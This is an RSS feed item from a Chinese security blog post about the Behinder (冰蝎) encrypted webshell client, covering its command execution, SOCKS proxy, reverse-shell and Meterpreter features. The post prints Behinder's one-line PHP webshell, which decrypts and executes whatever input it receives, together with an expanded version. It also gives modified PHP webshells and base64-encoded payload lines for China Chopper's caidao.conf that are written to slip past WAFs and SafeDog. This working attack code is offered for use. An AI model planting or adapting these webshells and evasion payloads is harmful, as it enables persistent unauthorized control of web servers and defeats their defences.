<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>冰蝎 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E5%86%B0%E8%9D%8E/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:21:38 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>冰蝎动态二进制加密过waf并修改自己菜刀过狗</title>
		<link>/web/580.html</link>
					<comments>/web/580.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Mon, 15 Oct 2018 03:43:52 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[一句话]]></category>
		<category><![CDATA[冰蝎]]></category>
		<category><![CDATA[菜刀]]></category>
		<category><![CDATA[过狗]]></category>
		<guid isPermaLink="false">/?p=580</guid>

					<description><![CDATA[rebeyond大大出的神器冰蝎下载地址 作为新型加密网站管理客户端，冰蝎算是作为中国菜刀的替代者。我们来看下他的主要功能。 主要功能 1. 基本信息 客户端和服务端握手之后，会获...]]></description>
										<content:encoded><![CDATA[<blockquote>
<p class="md-end-block" contenteditable="true"><span class="md-expand">rebeyond大大出的神器<span class="wpcom_tag_link"><a href="/tags/%e5%86%b0%e8%9d%8e" title="冰蝎" target="_blank">冰蝎</a></span></span><span class=" md-link"><a spellcheck="false" href="https://github.com/rebeyond/Behinder/releases">下载地址</a></span></p>
</blockquote>
<p class="md-end-block" contenteditable="true">作为新型加密网站管理客户端，冰蝎算是作为中国<span class="wpcom_tag_link"><a href="/tags/%e8%8f%9c%e5%88%80" title="菜刀" target="_blank">菜刀</a></span>的替代者。我们来看下他的主要功能。</p>
<h1 class="md-end-block md-heading" contenteditable="true"><span class="">主要功能</span></h1>
<h3 class="md-end-block md-heading" contenteditable="true"><span class="">1. 基本信息</span></h3>
<p class="md-end-block" contenteditable="true"><span class="">客户端和服务端握手之后，会获取服务器的基本信息，Java、.NET版本包括环境变量、系统属性等，PHP版本会显示phpinfo的内容。</span></p>
<h3 class="md-end-block md-heading" contenteditable="true"><span class="">2. 文件管理</span></h3>
<p class="md-end-block" contenteditable="true">这个没什么好说的，无非是文件的增删改查，稍微不同的是上传的文件都是加密传输的，可以避免被拦截。</p>
<h3 class="md-end-block md-heading" contenteditable="true">3. 命令执行</h3>
<p class="md-end-block" contenteditable="true"><span class="">执行单条操作系统命令。</span></p>
<h3 class="md-end-block md-heading" contenteditable="true"><span class="">4. 虚拟终端</span></h3>
<p class="md-end-block" contenteditable="true">虚拟终端是模拟了一个真实的交互式Shell环境，相当于把服务器侧的Shell给搬到了客户端，在这个Shell里可以执行各种需要交互式的命令，如ssh、mysql。比如说：我们可以在这个Shell里去ssh连接服务器侧内网的其他主机，可以参考下面这个动图： <span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162425-3f32bef2-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162425-3f32bef2-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162425-3f32bef2-bfd3-1.gif" /></span></a></span></p>
<p class="md-end-block" contenteditable="true">当然，如果你习惯powershell，也可以弹个powershell出来，如下图：</p>
<p class="md-end-block" contenteditable="true"><span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162509-5989eb36-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162509-5989eb36-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162509-5989eb36-bfd3-1.gif" /></span></a></span></p>
<h3 class="md-end-block md-heading" contenteditable="true">5. Socks代理</h3>
<p class="md-end-block" contenteditable="true">虚拟终端功能其实就已经部分实现了内网穿透的能力，在Shell环境里做的所有事情都是在内网环境中的。不过为了方便使用其他工具，客户端还提供了基于<span class="wpcom_tag_link"><a href="/tags/%e4%b8%80%e5%8f%a5%e8%af%9d" title="一句话" target="_blank">一句话</a></span>木马的Socks代理功能，一键开启，简单高效，可以参考如下动图：</p>
<p class="md-end-block" contenteditable="true"><span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162620-839c5d50-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162620-839c5d50-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162620-839c5d50-bfd3-1.gif" /></span></a></span></p>
<p class="md-end-block" contenteditable="true">顺便说一下，代理过程中所有的流量都是在socks的基础上封装了一层AES。</p>
<h3 class="md-end-block md-heading" contenteditable="true">6.反弹Shell</h3>
<p class="md-end-block" contenteditable="true">反弹Shell是突破防火墙的利器，也几乎是后渗透过程的必备步骤。提到后渗透，当然少不了metasploit，提到metasploit，当然少不了meterpreter，所以冰蝎客户端提供了两种反弹Shell的方式，常规Shell和Meterpreter，实现和metasploit的一键无缝对接。请参考如下动图：</p>
<p class="md-end-block" contenteditable="true"><span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162737-b16662f8-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162737-b16662f8-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162737-b16662f8-bfd3-1.gif" /></span></a></span></p>
<p class="md-end-block" contenteditable="true">上图演示的是Meterpreter，当然常规的Shell也可以对接metasploit，就不演示了。</p>
<h3 class="md-end-block md-heading" contenteditable="true">7.数据库管理</h3>
<p class="md-end-block" contenteditable="true">常规功能，实现了数据库的可视化管理，放张截图吧： <span class="md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162809-c4b25d8a-bfd3-1.png"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162809-c4b25d8a-bfd3-1.png"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162809-c4b25d8a-bfd3-1.png" /></span></a></span></p>
<p class="md-end-block" contenteditable="true"><span class="">和常规管理工具不同的是，在Java和.NET环境中，当目标机器中没有对应数据库的驱动时，会自动上传并加载数据库驱动。比如目标程序用的是MySQL的数据，但是内网有另外一台Oracle，此时就会自动上传并加载Oracle对应的驱动。</span></p>
<h3 class="md-end-block md-heading" contenteditable="true">8.自定义代码</h3>
<p class="md-end-block" contenteditable="true"><span class="">可以在服务端执行任意的Java、PHP、C#代码，这也是个常规功能，值得一提的是我们输入的代码都是加密传输的，所以不用为了躲避waf而用各种编码变形，效果请参考如下动图：</span></p>
<p class="md-end-block" contenteditable="true"><span class=" md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162856-e09cdbf6-bfd3-1.gif"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162856-e09cdbf6-bfd3-1.gif"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162856-e09cdbf6-bfd3-1.gif" /></span></a></span></p>
<h3 class="md-end-block md-heading" contenteditable="true">9.备忘录</h3>
<p class="md-end-block" contenteditable="true"><span class="">渗透的时候总有很多零碎的信息需要记录，所以针对每个Shell提供了一个备忘录的功能，目前只支持纯文本，粘贴进去自动保存：</span></p>
<p class="md-end-block" contenteditable="true"><span class="md-link"><a spellcheck="false" href="https://xzfile.aliyuncs.com/media/upload/picture/20180924162934-f7650e12-bfd3-1.png"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162934-f7650e12-bfd3-1.png"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180924162934-f7650e12-bfd3-1.png" /></span></a></span></p>
<h1 class="md-end-block md-heading" contenteditable="true">接下来我们看下他的亮点出在哪里</h1>
<p><span class="">看下他的php一句话</span></p>
<pre class="lang:default decode:true ">&lt;?php session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&amp;$b[0]($b[1]);?&gt;
</pre>
<p>&nbsp;</p>
<p>为了代码可读性，我们来扩充下：</p>
<pre class="lang:default decode:true ">&lt;?php
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $decrptContent=openssl_decrypt(file_get_contents("php://input"), "AES128", $key);
    $arr=explode('|',$decrptContent);
    $func=$arr[0];
    $params=$arr[1];
    $func($params);
}
?&gt;</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">介绍下流程</p>
<ul class="ul-list" data-mark="-">
<li class="md-list-item">
<p class="md-end-block" contenteditable="true"><span class="">首先get发起带密码的请求，服务端随机产生密钥存入session。</span></p>
</li>
<li class="md-list-item">
<p class="md-end-block" contenteditable="true"><span class="">获取session中的密钥，然后将客户端发送的源代码进行aes加密，通过</span><span spellcheck="false"><code>|</code></span><span class="">分割，然后通过php的可变函数执行。</span></p>
</li>
</ul>
<p class="md-end-block" contenteditable="true"><span class="">具体一点，比如我们客户端有一段代码</span></p>
<pre class="lang:default decode:true ">assert|eval("phpinfo();")</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">进行aes128加密发送给服务端，服务端用<span spellcheck="false"><code>explode</code></span>函数分割字符，索引为0的是<span spellcheck="false"><code>assert</code></span>，索引为1的是<span spellcheck="false"><code>eval("phpinfo();")</code></span>，然后通过可变函数执行<span spellcheck="false"><code>assert("eval(\"phpinfo();\")")</code></span>，这样就很清晰明了了。</p>
<h1 class="md-end-block md-heading" contenteditable="true"><span class="">过waf的效果</span></h1>
<p class="md-end-block" contenteditable="true">常规一句话<span class="" spellcheck="false"><code>&lt;?php @eval($_POST['caidao']);?&gt;</code></span>菜刀链接：</p>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180921104312-1560723c-bd48-1.png"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180921104312-1560723c-bd48-1.png" /></span></p>
<p class="md-end-block" contenteditable="true">新型一句话冰蝎链接：</p>
<p class="md-end-block" contenteditable="true"><span class="md-image md-img-loaded" contenteditable="false" data-src="https://xzfile.aliyuncs.com/media/upload/picture/20180921104326-1d78ff8e-bd48-1.png"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180921104326-1d78ff8e-bd48-1.png" /></span></p>
<h1 class="md-end-block md-heading" contenteditable="true">对菜刀的修改</h1>
<p class="md-end-block" contenteditable="true">对这个一句话颇感兴趣，那么我们是不是可以把菜刀也改一改呢？</p>
<p class="md-end-block" contenteditable="true">我本地搭建了环境，一句话内容为<span class="" spellcheck="false"><code>&lt;?php @eval($_POST['caidao']);?&gt;</code></span></p>
<p><span class="">先来抓包看下菜刀的请求包</span></p>
<p><a href="https://img.chabug.org/img/20181015111909.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181015111909.png" width="1595" height="616" /></a></p>
<p class="md-end-block md-focus" contenteditable="true"><span class="md-expand">在新版菜刀2016的caidao.conf中45行，</span><span class="" spellcheck="false"><code>%s</code></span><span class="">是执行的命令</span></p>
<pre class="lang:default decode:true ">ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&amp;id=%s</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true"><span class="">解密后</span></p>
<pre class="lang:default decode:true ">eval(base64_decode($_POST[id]));&amp;id=%s</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">那么我们的一句话可以这样写</p>
<pre class="lang:default decode:true ">&lt;?php
if ($_GET['pass']!=1){
}
else{
    $decrpt = file_get_contents("php://input");
    $arrs = explode("|", $decrpt)[1];
    $arrs = explode("|", base64_decode($arrs));
    call_user_func($arrs[0],$arrs[1]);
}
​
?&gt;</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">你也可以这样来</p>
<pre class="lang:default decode:true ">&lt;?php
$decrpt = $_POST['x'];
$arrs = explode("|", $decrpt)[1];
$arrs = explode("|", base64_decode($arrs));
var_dump($arrs[0],$arrs[1]);
call_user_func($arrs[0],$arrs[1]);
?&gt;</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true"><span class="">那么我们菜刀要改下</span></p>
<pre class="lang:default decode:true ">|assert|eval(base64_decode($_POST[id]));|&amp;id=%s</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true"><span class="">在caidao.conf的45行就要改成</span></p>
<pre class="lang:default decode:true ">|YXNzZXJ0fGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbaWRdKSk7|&amp;id=%s</pre>
<p>&nbsp;</p>
<p class="md-end-block" contenteditable="true">这样和冰蝎实现的效果就一样了，<span class=""><strong>同样<span class="wpcom_tag_link"><a href="/tags/%e8%bf%87%e7%8b%97" title="过狗" target="_blank">过狗</a></span></strong></span><span class="">，愉快玩耍吧！</span></p>
<p class="md-end-block" contenteditable="true"><span class="">涉及到的资料，表示感谢！</span></p>
<p class="md-end-block" contenteditable="true"><span class="md-link" spellcheck="false"><a href="https://www.t00ls.net/thread-48079-1-1.html">https://www.t00ls.net/thread-48079-1-1.html</a></span></p>
<p class="md-end-block" contenteditable="true"><span class="md-link md-expand" spellcheck="false"><a href="https://xz.aliyun.com/t/2774">https://xz.aliyun.com/t/2774</a></span></p>
]]></content:encoded>
					
					<wfw:commentRss>/web/580.html/feed</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
	</channel>
</rss>
